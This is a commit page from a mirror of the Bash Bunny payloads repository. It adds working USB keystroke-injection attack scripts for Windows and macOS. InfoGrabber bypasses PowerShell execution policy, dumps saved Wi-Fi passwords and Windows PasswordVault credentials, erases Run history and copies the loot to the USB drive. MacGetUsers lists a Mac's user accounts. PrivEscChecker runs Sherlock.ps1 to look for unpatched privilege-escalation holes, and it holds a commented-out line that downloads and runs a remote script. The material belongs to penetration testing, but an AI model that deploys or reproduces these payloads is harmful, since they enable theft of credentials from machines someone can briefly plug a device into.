hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Cleanup: Sort payloads by category

Browse Source
This commit is contained in:
Sebastian Kinne
2017-04-10 13:29:17 +10:00
parent 288d90c60e
commit 85b1bc7aca
513 changed files with 2 additions and 361 deletions
Download Patch File Download Diff File Expand all files Collapse all files

206
payloads/library/recon/InfoGrabber/info.ps1 Normal file
View File

@@ -0,0 +1,206 @@
# Shows details of currently running PC
# Simen Kjeserud (Original creator), Gachnang
#Get info about pc
$computerPubIP=(Invoke-WebRequest ipinfo.io/ip).Content
$computerIP = get-WmiObject Win32_NetworkAdapterConfiguration|Where {$_.Ipaddress.length -gt 1}
$IsDHCPEnabled = $false
$Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "DHCPEnabled=$True" | ? {$_.IPEnabled}
foreach ($Network in $Networks) {
If($network.DHCPEnabled) {
$IsDHCPEnabled = $true
}
[string[]]$computerMAC =$Network.MACAddress
}
$computerSystem = Get-CimInstance CIM_ComputerSystem
$computerBIOS = Get-CimInstance CIM_BIOSElement
$computerOs=Get-WmiObject win32_operatingsystem | select Caption, CSName, Version, @{Name="InstallDate";Expression={([WMI]'').ConvertToDateTime($_.InstallDate)}} , @{Name="LastBootUpTime";Expression={([WMI]'').ConvertToDateTime($_.LastBootUpTime)}}, @{Name="LocalDateTime";Expression={([WMI]'').ConvertToDateTime($_.LocalDateTime)}}, CurrentTimeZone, CountryCode, OSLanguage, SerialNumber, WindowsDirectory | Format-List
$computerCpu=Get-WmiObject Win32_Processor | select DeviceID, Name, Caption, Manufacturer, MaxClockSpeed, L2CacheSize, L2CacheSpeed, L3CacheSize, L3CacheSpeed | Format-List
$computerMainboard=Get-WmiObject Win32_BaseBoard | Format-List
$computerRamCapacity=Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1} GB" -f ($_.sum / 1GB)}
$computerRam=Get-WmiObject Win32_PhysicalMemory | select DeviceLocator, @{Name="Capacity";Expression={ "{0:N1} GB" -f ($_.Capacity / 1GB)}}, ConfiguredClockSpeed, ConfiguredVoltage | Format-Table
# Get HDDs
$driveType = @{
2="Removable disk "
3="Fixed local disk "
4="Network disk "
5="Compact disk "}
$Hdds = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, @{Name="DriveType";Expression={$driveType.item([int]$_.DriveType)}}, FileSystem,VolumeSerialNumber,@{Name="Size_GB";Expression={"{0:N1} GB" -f ($_.Size / 1Gb)}}, @{Name="FreeSpace_GB";Expression={"{0:N1} GB" -f ($_.FreeSpace / 1Gb)}}, @{Name="FreeSpace_percent";Expression={"{0:N1}%" -f ((100 / ($_.Size / $_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,DriveType,FileSystem,VolumeSerialNumber,@{ Name="Size GB"; Expression={$_.Size_GB}; align="right"; }, @{ Name="FreeSpace GB"; Expression={$_.FreeSpace_GB}; align="right"; }, @{ Name="FreeSpace %"; Expression={$_.FreeSpace_percent}; align="right"; }
# Check RDP
$RDP
if ((Get-ItemProperty "hklm:\System\CurrentControlSet\Control\Terminal Server").fDenyTSConnections -eq 0) {
$RDP = "RDP is Enabled"
} else {
$RDP = "RDP is NOT enabled"
}
# Get network interfaces
#| where { $_.ipaddress -notlike $null }
$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress
# Get wifi SSID and password
$WLANProfileNames =@()
#Get all the WLAN profile names
$Output = netsh.exe wlan show profiles | Select-String -pattern " : "
#Trim the output to receive only the name
Foreach($WLANProfileName in $Output){
$WLANProfileNames += (($WLANProfileName -split ":")[1]).Trim()
}
$WLANProfileObjects =@()
#Bind the WLAN profile names and also the password to a custom object
Foreach($WLANProfileName in $WLANProfileNames){
#get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user
try{
$WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Key Content") -split ":")[1]).Trim()
}Catch{
$WLANProfilePassword = "The password is not stored in this profile"
}
#Build the object and add this to an array
$WLANProfileObject = New-Object PSCustomobject
$WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfileName" -Value $WLANProfileName
$WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfilePassword" -Value $WLANProfilePassword
$WLANProfileObjects += $WLANProfileObject
Remove-Variable WLANProfileObject
}
# local-user
$luser=Get-WmiObject -Class Win32_UserAccount | Format-Table Caption, Domain, Name, FullName, SID
# process first
$process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine
# get listeners / ActiveTcpConnections
#[System.Net.NetworkInformation.IPGlobalProperties]::GetIPGlobalProperties().GetActiveTcpConnections() | Format-Table -AutoSize
$listener = Get-NetTCPConnection | select @{Name="LocalAddress";Expression={$_.LocalAddress + ":" + $_.LocalPort}}, @{Name="RemoteAddress";Expression={$_.RemoteAddress + ":" + $_.RemotePort}}, State, AppliedSetting, OwningProcess
$listener = $listener | foreach-object {
$listenerItem = $_
$processItem = ($process | where { [int]$_.Handle -like [int]$listenerItem.OwningProcess })
new-object PSObject -property @{
"LocalAddress" = $listenerItem.LocalAddress
"RemoteAddress" = $listenerItem.RemoteAddress
"State" = $listenerItem.State
"AppliedSetting" = $listenerItem.AppliedSetting
"OwningProcess" = $listenerItem.OwningProcess
"ProcessName" = $processItem.ProcessName
}
} | select LocalAddress, RemoteAddress, State, AppliedSetting, OwningProcess, ProcessName | Sort-Object LocalAddress | Format-Table
# process last
$process = $process | Sort-Object ProcessName | Format-Table Handle, ProcessName, ExecutablePath, CommandLine
# service
$service=Get-WmiObject win32_service | select State, Name, DisplayName, PathName, @{Name="Sort";Expression={$_.State + $_.Name}} | Sort-Object Sort | Format-Table State, Name, DisplayName, PathName
# installed software (get uninstaller)
$software=Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { $_.DisplayName -notlike $null } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize
# drivers
$drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion
# videocard
$videocard=Get-WmiObject Win32_VideoController | Format-Table Name, VideoProcessor, DriverVersion, CurrentHorizontalResolution, CurrentVerticalResolution
#Get installed passwords
$profileRows = $output | Select-String -Pattern 'All User Profile'
$profileNames = New-Object System.Collections.ArrayList
for($i = 0; $i -lt $profileRows.Count; $i++){
$profileName = ($profileRows[$i] -split ":")[-1].Trim()
$profileOutput = netsh.exe wlan show profiles name="$profileName" key=clear
$SSIDSearchResult = $profileOutput| Select-String -Pattern 'SSID Name'
$profileSSID = ($SSIDSearchResult -split ":")[-1].Trim() -replace '"'
$passwordSearchResult = $profileOutput| Select-String -Pattern 'Key Content'
if($passwordSearchResult){
$profilePw = ($passwordSearchResult -split ":")[-1].Trim()
} else {
$profilePw = ''
}
$networkObject = New-Object -TypeName psobject -Property @{
ProfileName = $profileName
SSID = $profileSSID
Password = $profilePw
}
$profileNames.Add($networkObject)
}
$profileNames.Add($networkObject)
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
$vault = $vault.RetrieveAll() | % { $_.RetrievePassword();$_ }
#The output
Clear-Host
Write-Host
$computerSystem.Name
"=================================================================="
"Manufacturer: " + $computerSystem.Manufacturer
"Model: " + $computerSystem.Model
"Serial Number: " + $computerBIOS.SerialNumber
""
""
""
"OS:"
"=================================================================="+ ($computerOs| out-string)
"CPU:"
"=================================================================="+ ($computerCpu| out-string)
"RAM:"
"=================================================================="
"Capacity: " + $computerRamCapacity+ ($computerRam| out-string)
"Mainboard:"
"=================================================================="+ ($computerMainboard| out-string)
"Bios:"
"=================================================================="+ (Get-WmiObject win32_bios| out-string)
"Local-user:"
"=================================================================="+ ($luser| out-string)
"HDDs:"
"=================================================================="+ ($Hdds| out-string)
"Network: "
"=================================================================="
"Computers MAC adress: " + $computerMAC
"Computers IP adress: " + $computerIP.ipaddress[0]
"Public IP adress: " + $computerPubIP
"RDP: " + $RDP
""
($Network| out-string)
"W-Lan profiles: "
"=================================================================="+ ($WLANProfileObjects| out-string)
"listeners / ActiveTcpConnections"
"=================================================================="+ ($listener| out-string)
"Current running process: "
"=================================================================="+ ($process| out-string)
"Services: "
"=================================================================="+ ($service| out-string)
"Installed software:"
"=================================================================="+ ($software| out-string)
"Installed drivers:"
"=================================================================="+ ($drivers| out-string)
"Installed videocards:"
"==================================================================" + ($videocard| out-string)
"Windows/user passwords"
"=================================================================="
$vault | select Resource, UserName, Password | Sort-Object Resource | ft -AutoSize

43
payloads/library/recon/InfoGrabber/payload.txt Normal file
View File

@@ -0,0 +1,43 @@
#!/bin/bash
#
# Title: Info_Grabber
# Author: Simen Kjeserud
# Version: 1.0
# Target: Windows
# Creds: Hak5Darren for inspiration
#
# Executes run.ps1 which executes scripts that gets you information about
# the computer running and will also get wifi passwords
LED R B 100
ATTACKMODE HID STORAGE
#Check swith copied from bunny_helper
check_switch() {
switch1=`cat /sys/class/gpio_sw/PA8/data`
switch2=`cat /sys/class/gpio_sw/PL4/data`
switch3=`cat /sys/class/gpio_sw/PL3/data`
if [ "x$switch1" = "x0" ] && [ "x$switch2" = "x1" ] && [ "x$switch3" = "x1" ]; then
SWITCH_POSITION="switch1"
elif [ "x$switch1" = "x1" ] && [ "x$switch2" = "x0" ] && [ "x$switch3" = "x1" ]; then
SWITCH_POSITION="switch2"
elif [ "x$switch1" = "x1" ] && [ "x$switch2" = "x1" ] && [ "x$switch3" = "x0" ]; then
SWITCH_POSITION="switch3"
else
SWITCH_POSITION="invalid"
fi
}
check_switch
# Set your language here
QUACK SET_LANGUAGE no
QUACK GUI r
QUACK DELAY 200
# Open run and run the run.ps1 script in the Bashbunny
QUACK STRING powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
QUACK ENTER
LED G
#Green means good to go

81
payloads/library/recon/InfoGrabber/readme.md Normal file
View File

@@ -0,0 +1,81 @@
# InfoGrabber for the Bunnys
Author: Simen Kjeserud
Version: Version 1.0
Credit: Hak5Darren for inspiration
((`\
___ \\ '--._
.'` `' o )
/ \ '. __.'
_| /_ \ \_\_
{_\______\-'\__\_\
Check out my website:
aknemis.com
## Description
Gather a lot of information about the computer and place it in a text file in loot/info/.
Here you can se what it will look like:
System Information for: DESKTOP-9BVPPVN
Manufacturer: Dell Inc.
Model: XPS 13 9360
Serial Number: *******
CPU: Intel(R) Core(TM) i7-7500U CPU @ 2.70GHz
HDD Capacity: 464.38GB
HDD Space: 82.32 % Free (382.28GB)
RAM: 15.89GB
Operating System: Microsoft Windows 10 Home, Service Pack: 0
User logged In: DESKTOP-9BVPPVN\aknem
Last Reboot: 02/21/2017 19:49:30
Computers MAC adress: ****************
Computers IP adress: ***********
Public IP adress: ****************
RDP: RDP is NOT enabled
| ProfileName | SSID | Password |
| ---------------- | ------------------------------------- | ------------------------------------- |
| privatsna11234 | privatsna11234 | ******** |
| privatsna11234 | privatsna11234 | ******** |
## Configuration
Made for windows. The only thing you will need to change is the Ducky language so it matches the keyboard input.
## Requirements
DuckyTools for the BashBunny, and you need to change to the language the computer uses.
## STATUS
| LED | Status |
| ---------------- | ------------------------------------- |
| Purple (blinking)| Attack in progress |
| Green | Attack Finished |
## Discussion (Not yet created)
[Hak5 Forum Thread not yet created](https://forums.hak5.org/index.php?/topic/ "Hak5 Forum Thread")

35
payloads/library/recon/InfoGrabber/run.ps1 Normal file
View File

@@ -0,0 +1,35 @@
#Remove run history
powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
#Get the path and file name that you are using for output
# find connected bashbunny drive:
$VolumeName = "bashbunny"
$computerSystem = Get-CimInstance CIM_ComputerSystem
$backupDrive = $null
get-wmiobject win32_logicaldisk | % {
if ($_.VolumeName -eq $VolumeName) {
$backupDrive = $_.DeviceID
}
}
#See if a loot folder exist in usb. If not create one
$TARGETDIR = $backupDrive + "\loot"
if(!(Test-Path -Path $TARGETDIR )){
New-Item -ItemType directory -Path $TARGETDIR
}
#See if a info folder exist in loot folder. If not create one
$TARGETDIR = $backupDrive + "\loot\info"
if(!(Test-Path -Path $TARGETDIR )){
New-Item -ItemType directory -Path $TARGETDIR
}
#Create a path that will be used to make the file
$datetime = get-date -f yyyy-MM-dd_HH-mm
$backupPath = $backupDrive + "\loot\info\" + $computerSystem.Name + " - " + $datetime + ".txt"
#Create output from info script
$TARGETDIR = $MyInvocation.MyCommand.Path
$TARGETDIR = $TARGETDIR -replace ".......$"
cd $TARGETDIR
PowerShell.exe -ExecutionPolicy Bypass -File info.ps1 > $backupPath

35
payloads/library/recon/MacGetUsers/payload.txt Normal file
View File

@@ -0,0 +1,35 @@
#!/bin/bash
#
# Title: Mac Get Users
# Author: ericfri
# Version: 1.0
#
# Lists the users available on the Mac
# then stashes them in /loot/MacLoot/MacUsers/
#
# Amber..............Executing payload
# Green..............Finished
#
LED G R
ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE
lootdir=loot/MacLoot/MacUsers
mkdir -p /root/udisk/$lootdir
QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 2500
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir
QUACK ENTER
QUACK DELAY 500
QUACK STRING dscl . list /Users \| grep -v '_' \> /Volumes/BashBunny/$lootdir/data.txt\; diskutil eject /Volumes/BashBunny\; killall Terminal
QUACK ENTER
# Sync filesystem
sync
# Green LED for finished
LED G

17
payloads/library/recon/MacGetUsers/readme.md Normal file
View File

@@ -0,0 +1,17 @@
# Mac User Lister for the BashBunny
* Author: ericfri
* Version: Version 1.0
* Target: OSX
## Description
A payload that lists the users on the system and creates a file inside a folder on the BashBunny called MacLoot/MacUsers.
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Amber | Executing Payload |
| Green | Attack Finished |

477
payloads/library/recon/PrivEscChecker/Sherlock.ps1 Normal file
View File

@@ -0,0 +1,477 @@
<#
File: Sherlock.ps1
Author: @_RastaMouse
License: GNU General Public License v3.0
#>
$Global:ExploitTable = $null
function Get-FileVersionInfo ($FilePath) {
$VersionInfo = (Get-Item $FilePath).VersionInfo
$FileVersion = ( "{0}.{1}.{2}.{3}" -f $VersionInfo.FileMajorPart, $VersionInfo.FileMinorPart, $VersionInfo.FileBuildPart, $VersionInfo.FilePrivatePart )
return $FileVersion
}
function Get-Architecture {
# This is the CPU architecture. Returns "64-bit" or "32-bit".
$CPUArchitecture = (Get-WmiObject Win32_OperatingSystem).OSArchitecture
# This is the process architecture, e.g. are we an x86 process running on a 64-bit system. Retuns "AMD64" or "x86".
$ProcessArchitecture = $env:PROCESSOR_ARCHITECTURE
return $CPUArchitecture, $ProcessArchitecture
}
function New-ExploitTable {
# Create the table
$Global:ExploitTable = New-Object System.Data.DataTable
# Create the columns
$Global:ExploitTable.Columns.Add("Title")
$Global:ExploitTable.Columns.Add("MSBulletin")
$Global:ExploitTable.Columns.Add("CVEID")
$Global:ExploitTable.Columns.Add("Link")
$Global:ExploitTable.Columns.Add("VulnStatus")
# Add the exploits we are interested in.
# MS10
$Global:ExploitTable.Rows.Add("User Mode to Ring (KiTrap0D)","MS10-015","2010-0232","https://www.exploit-db.com/exploits/11199/")
$Global:ExploitTable.Rows.Add("Task Scheduler .XML","MS10-092","2010-3338, 2010-3888","https://www.exploit-db.com/exploits/19930/")
# MS13
$Global:ExploitTable.Rows.Add("NTUserMessageCall Win32k Kernel Pool Overflow","MS13-053","2013-1300","https://www.exploit-db.com/exploits/33213/")
$Global:ExploitTable.Rows.Add("TrackPopupMenuEx Win32k NULL Page","MS13-081","2013-3881","https://www.exploit-db.com/exploits/31576/")
# MS14
$Global:ExploitTable.Rows.Add("TrackPopupMenu Win32k Null Pointer Dereference","MS14-058","2014-4113","https://www.exploit-db.com/exploits/35101/")
# MS15
$Global:ExploitTable.Rows.Add("ClientCopyImage Win32k","MS15-051","2015-1701, 2015-2433","https://www.exploit-db.com/exploits/37367/")
$Global:ExploitTable.Rows.Add("Font Driver Buffer Overflow","MS15-078","2015-2426, 2015-2433","https://www.exploit-db.com/exploits/38222/")
# MS16
$Global:ExploitTable.Rows.Add("'mrxdav.sys' WebDAV","MS16-016","2016-0051","https://www.exploit-db.com/exploits/40085/")
$Global:ExploitTable.Rows.Add("Secondary Logon Handle","MS16-032","2016-0099","https://www.exploit-db.com/exploits/39719/")
}
function Set-ExploitTable ($MSBulletin, $VulnStatus) {
$Global:ExploitTable | Where { $_.MSBulletin -eq $MSBulletin
} | ForEach-Object {
$_.VulnStatus = $VulnStatus
}
}
function Get-Results {
$Global:ExploitTable
}
function Find-AllVulns {
if ( !$Global:ExploitTable ) {
$null = New-ExploitTable
}
Find-MS10015
Find-MS10092
Find-MS13053
Find-MS13081
Find-MS14058
Find-MS15051
Find-MS15078
Find-MS16016
Find-MS16032
Get-Results
}
function Find-MS10015 {
# Set the MS Bulletin
$MSBulletin = "MS10-015"
# Check the system architecture
$Architecture = Get-Architecture
# This exploit doesn't work against 64-bit systems
if ( $Architecture[0] -eq "64-bit" ) {
$VulnStatus = "Not supported on 64-bit systems"
} Else {
# Get the file version info for 'ntoskrnl.exe'
$Path = $env:windir + "\system32\ntoskrnl.exe"
$VersionInfo = Get-FileVersionInfo($Path)
# Split the string into parts
$VersionInfo = $VersionInfo.Split(".")
# Get the Build and Revision
$Build = $VersionInfo[2]
$Revision = $VersionInfo[3].Split(" ")[0] # Drop the junk
# Decide which versions are vulnerable
switch ( $Build ) {
7600 { if ( $Revision -le "20591" ) { $VulnStatus = "Appears Vulnerable" } }
default { $VulnStatus = "Not Vulnerable" }
}
}
# Update the Exploit Table
Set-ExploitTable $MSBulletin $VulnStatus
}
function Find-MS10092 {
# Set the MS Bulletin
$MSBulletin = "MS10-092"
# Check the system architecture
$Architecture = Get-Architecture
# If running on 64-bit system, check the process architecture to ensure it's also 64-bit.
if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) {
# Get the file version info for 'schedsvc.dll'
$Path = $env:windir + "\system32\schedsvc.dll"
$VersionInfo = Get-FileVersionInfo($Path)
# Split the string into parts
$VersionInfo = $VersionInfo.Split(".")
# Get the Build and Revision
$Build = $VersionInfo[2]
$Revision = $VersionInfo[3].Split(" ")[0] # Drop the junk
# Decide which versions are vulnerable
switch ( $Build ) {
7600 { if ( $Revision -le "20830" ) { $VulnStatus = "Appears Vulnerable" } }
default { $VulnStatus = "Not Vulnerable" }
}
} ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) {
$VulnStatus = "Migrate to a 64-bit process to avoid WOW64 Filesystem Redirection shenanigans"
}
# Update the Exploit Table
Set-ExploitTable $MSBulletin $VulnStatus
}
function Find-MS13053 {
# Set the MS Bulletin
$MSBulletin = "MS13-053"
# Check the system architecture
$Architecture = Get-Architecture
# This exploit doesn't work against 64-bit systems
if ( $Architecture[0] -eq "64-bit" ) {
$VulnStatus = "Not supported on 64-bit systems"
} Else {
# Get the file version info for 'win32k.sys'
$Path = $env:windir + "\system32\win32k.sys"
$VersionInfo = Get-FileVersionInfo($Path)
# Split the string into parts
$VersionInfo = $VersionInfo.Split(".")
# Get the Build and Revision
$Build = $VersionInfo[2]
$Revision = $VersionInfo[3].Split(" ")[0] # Drop the junk
# Decide which versions are vulnerable
switch ( $Build ) {
7600 { if ( $Revision -ge "17000" ) { $VulnStatus = "Appears Vulnerable" } }
7601 { if ( $Revision -le "22348" ) { $VulnStatus = "Appears Vulnerable" } }
9200 { if ( $Revision -le "20732" ) { $VulnStatus = "Appears Vulnerable" } }
default { $VulnStatus = "Not Vulnerable" }
}
}
# Update the Exploit Table
Set-ExploitTable $MSBulletin $VulnStatus
}
function Find-MS13081 {
# Set the MS Bulletin
$MSBulletin = "MS13-081"
# Check the system architecture
$Architecture = Get-Architecture
# This exploit doesn't work against 64-bit systems
if ( $Architecture[0] -eq "64-bit" ) {
$VulnStatus = "Not supported on 64-bit systems"
} Else {
# Get the file version info for 'win32k.sys'
$Path = $env:windir + "\system32\win32k.sys"
$VersionInfo = Get-FileVersionInfo($Path)
# Split the string into parts
$VersionInfo = $VersionInfo.Split(".")
# Get the Build and Revision
$Build = $VersionInfo[2]
$Revision = $VersionInfo[3].Split(" ")[0] # Drop the junk
# Decide which versions are vulnerable
switch ( $Build ) {
7600 { if ( $Revision -ge "18000" ) { $VulnStatus = "Appears Vulnerable" } }
7601 { if ( $Revision -le "22435" ) { $VulnStatus = "Appears Vulnerable" } }
9200 { if ( $Revision -le "20807" ) { $VulnStatus = "Appears Vulnerable" } }
default { $VulnStatus = "Not Vulnerable" }
}
}
# Update the Exploit Table
Set-ExploitTable $MSBulletin $VulnStatus
}
function Find-MS14058 {
# Set the MS Bulletin
$MSBulletin = "MS14-058"
# Check the system architecture
$Architecture = Get-Architecture
# If running on 64-bit system, check the process architecture to ensure it's also 64-bit.
if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) {
# Get the file version info for 'win32k.sys'
$Path = $env:windir + "\system32\win32k.sys"
$VersionInfo = Get-FileVersionInfo($Path)
# Split the string into parts
$VersionInfo = $VersionInfo.Split(".")
# Get the Build and Revision
$Build = $VersionInfo[2]
$Revision = $VersionInfo[3].Split(" ")[0] # Drop the junk
# Decide which versions are vulnerable
switch ( $Build ) {
7600 { if ( $Revision -ge "18000" ) { $VulnStatus = "Appears Vulnerable" } }
7601 { if ( $Revision -le "22823" ) { $VulnStatus = "Appears Vulnerable" } }
9200 { if ( $Revision -le "21247" ) { $VulnStatus = "Appears Vulnerable" } }
9600 { if ( $Revision -le "17353" ) { $VulnStatus = "Appears Vulnerable" } }
default { $VulnStatus = "Not Vulnerable" }
}
} ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) {
$VulnStatus = "Migrate to a 64-bit process to avoid WOW64 Filesystem Redirection shenanigans"
}
# Update the Exploit Table
Set-ExploitTable $MSBulletin $VulnStatus
}
function Find-MS15051 {
# Set the MS Bulletin
$MSBulletin = "MS15-051"
# Check the system architecture
$Architecture = Get-Architecture
# If running on 64-bit system, check the process architecture to ensure it's also 64-bit.
if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) {
# Get the file version info for 'win32k.sys'
$Path = $env:windir + "\system32\win32k.sys"
$VersionInfo = Get-FileVersionInfo($Path)
# Split the string into parts
$VersionInfo = $VersionInfo.Split(".")
# Get the Build and Revision
$Build = $VersionInfo[2]
$Revision = $VersionInfo[3].Split(" ")[0] # Drop the junk
# Decide which versions are vulnerable
switch ( $Build ) {
7600 { if ( $Revision -ge "18000" ) { $VulnStatus = "Appears Vulnerable" } }
7601 { if ( $Revision -le "22823" ) { $VulnStatus = "Appears Vulnerable" } }
9200 { if ( $Revision -le "21247" ) { $VulnStatus = "Appears Vulnerable" } }
9600 { if ( $Revision -le "17353" ) { $VulnStatus = "Appears Vulnerable" } }
default { $VulnStatus = "Not Vulnerable" }
}
} ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) {
$VulnStatus = "Migrate to a 64-bit process to avoid WOW64 Filesystem Redirection shenanigans"
}
# Update the Exploit Table
Set-ExploitTable $MSBulletin $VulnStatus
}
function Find-MS15078 {
# Set the MS Bulletin
$MSBulletin = "MS15-078"
# Get the file version info for 'atmfd.dll'
$Path = $env:windir + "\system32\atmfd.dll"
$VersionInfo = Get-FileVersionInfo($Path)
# Split the string into parts
$VersionInfo = $VersionInfo.Split(" ")
# Get the Revision
$Revision = $VersionInfo[2]
# Decide which versions are vulnerable
switch ( $Revision ) {
243 { $VulnStatus = "Appears Vulnerable" }
default { $VulnStatus = "Not Vulnerable" }
}
# Update the Exploit Table
Set-ExploitTable $MSBulletin $VulnStatus
}
function Find-MS16016 {
# Set the MS Bulletin
$MSBulletin = "MS16-016"
# Check the system architecture
$Architecture = Get-Architecture
# This exploit doesn't work against 64-bit systems
if ( $Architecture[0] -eq "64-bit" ) {
$VulnStatus = "Not supported on 64-bit systems"
} Else {
# Get the file version info for 'mrxdav.sys'
$Path = $env:windir + "\system32\drivers\mrxdav.sys"
$VersionInfo = Get-FileVersionInfo($Path)
# Split the string into parts
$VersionInfo = $VersionInfo.Split(".")
# Get the Build and Revision
$Build = $VersionInfo[2]
$Revision = $VersionInfo[3].Split(" ")[0] # Drop the junk
# Decide which versions are vulnerable
switch ( $Build ) {
7600 { if ( $Revision -ge "16000" ) { $VulnStatus = "Appears Vulnerable" } }
7601 { if ( $Revision -le "23317" ) { $VulnStatus = "Appears Vulnerable" } }
9200 { if ( $Revision -le "21738" ) { $VulnStatus = "Appears Vulnerable" } }
9600 { if ( $Revision -le "18189" ) { $VulnStatus = "Appears Vulnerable" } }
10240 { if ( $Revision -le "16683" ) { $VulnStatus = "Appears Vulnerable" } }
10586 { if ( $Revision -le "103" ) { $VulnStatus = "Appears Vulnerable" } }
default { $VulnStatus = "Not Vulnerable" }
}
}
# Update the Exploit Table
Set-ExploitTable $MSBulletin $VulnStatus
}
function Find-MS16032 {
# Set the MS Bulletin
$MSBulletin = "MS16-032"
# Check the system architecture
$Architecture = Get-Architecture
# If running on 64-bit system, check the process architecture to ensure it's also 64-bit.
if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) {
# Get the file version info for 'seclogon.dll'
$Path = $env:windir + "\system32\seclogon.dll"
$VersionInfo = Get-FileVersionInfo($Path)
# Split the string into parts
$VersionInfo = $VersionInfo.Split(".")
# Get the Build and Revision
$Build = $VersionInfo[2]
$Revision = $VersionInfo[3].Split(" ")[0] # Drop the junk
# Decide which versions are vulnerable
switch ( $Build ) {
7600 { if ( $Revision -ge "16000" ) { $VulnStatus = "Appears Vulnerable" } }
7601 { if ( $Revision -le "23348" ) { $VulnStatus = "Appears Vulnerable" } }
9200 { if ( $Revision -le "21768" ) { $VulnStatus = "Appears Vulnerable" } }
9600 { if ( $Revision -le "18230" ) { $VulnStatus = "Appears Vulnerable" } }
10240 { if ( $Revision -le "16724" ) { $VulnStatus = "Appears Vulnerable" } }
10586 { if ( $Revision -le "162" ) { $VulnStatus = "Appears Vulnerable" } }
default { $VulnStatus = "Not Vulnerable" }
}
} ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) {
$VulnStatus = "Migrate to a 64-bit process to avoid WOW64 Filesystem Redirection shenanigans"
}
# Update the Exploit Table
Set-ExploitTable $MSBulletin $VulnStatus
}

90
payloads/library/recon/PrivEscChecker/payload.txt Normal file
View File

@@ -0,0 +1,90 @@
#!/bin/bash
#
# Title: PrivEscChecker
# Author: illwill
# Version: 0.1
#
# Check Windows box for unpatched vulns that allow privilege escalation
# then stashes them in /root/udisk/loot/PrivEscChecker/%ComputerName%-%username%
# Can be used locally or webdls the script from github
# Credits to rasta-mouse for their powershell script:
# https://github.com/rasta-mouse/Sherlock Sherlock.ps1
#
# Blue...............Running Script
# Purple.............Checking Results
# Green..............Found Possible Privilege Escalation
# Red................No Possible Privilege Escalation
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
LED R 200
LOOTDIR=/root/udisk/loot/PrivEscChecker
mkdir -p $LOOTDIR
#cleanup any prior unfinished payloads
rm $LOOTDIR/DONE
rm $LOOTDIR/OUTPUT
ATTACKMODE HID STORAGE
LED B 200
# wait 6 seconds for the storage to popup, then open powershell and get bunny drive letter
Q DELAY 6000
Q GUI r
Q DELAY 100
Q STRING POWERSHELL
Q ENTER
Q DELAY 500
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100
########################################################################################################################
# Check for missing Windows update patches either by downloading or use local file (comment local and uncomment webdl) #
########################################################################################################################
# LOCAL FROM BUNNY
Q STRING PowerShell -NoProfile -ExecutionPolicy Bypass -Command \"\& \{Import-Module -Name \$Bunny\\payloads\\${SWITCH_POSITION}\\Sherlock.ps1\; Find-AllVulns \| Out-File \$Bunny\\loot\\PrivEscChecker\\OUTPUT.txt\}\"
# WEBDL FROM INTERNET
# Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nS1L45\'\)\; Find-AllVulns \| Out-File \$Bunny\\loot\\PrivEscChecker\\OUTPUT.txt
Q ENTER
Q DELAY 100
# Create a file called DONE with %ComputerName%-%username%
Q STRING New-Item \$Bunny\\loot\\PrivEscChecker\\DONE -type file -force -value \$env:computername-\$env:username
Q ENTER
Q DELAY 100
# Eject the USB Safely
Q STRING \$Eject \= New-Object -comObject Shell.Application
Q ENTER
Q DELAY 100
Q STRING \$Eject.NameSpace\(17\).ParseName\(\$Bunny\).InvokeVerb\(\"Eject\"\)
Q ENTER
Q STRING exit
Q ENTER
sync
#remount the drive and check results
LED R B 200
sleep 1
# Wait for the DONE file to be created so we know powershell is finished
LOOTDIR=/root/udisk/loot/PrivEscChecker
DONEFILE=$LOOTDIR/DONE
while [ ! -e $DONEFILE ]; do sleep .5; done;
sleep 1
# cat %ComputerName%-%username% from DONE as a variable to name folder and then delete
DIR=`cat $DONEFILE`
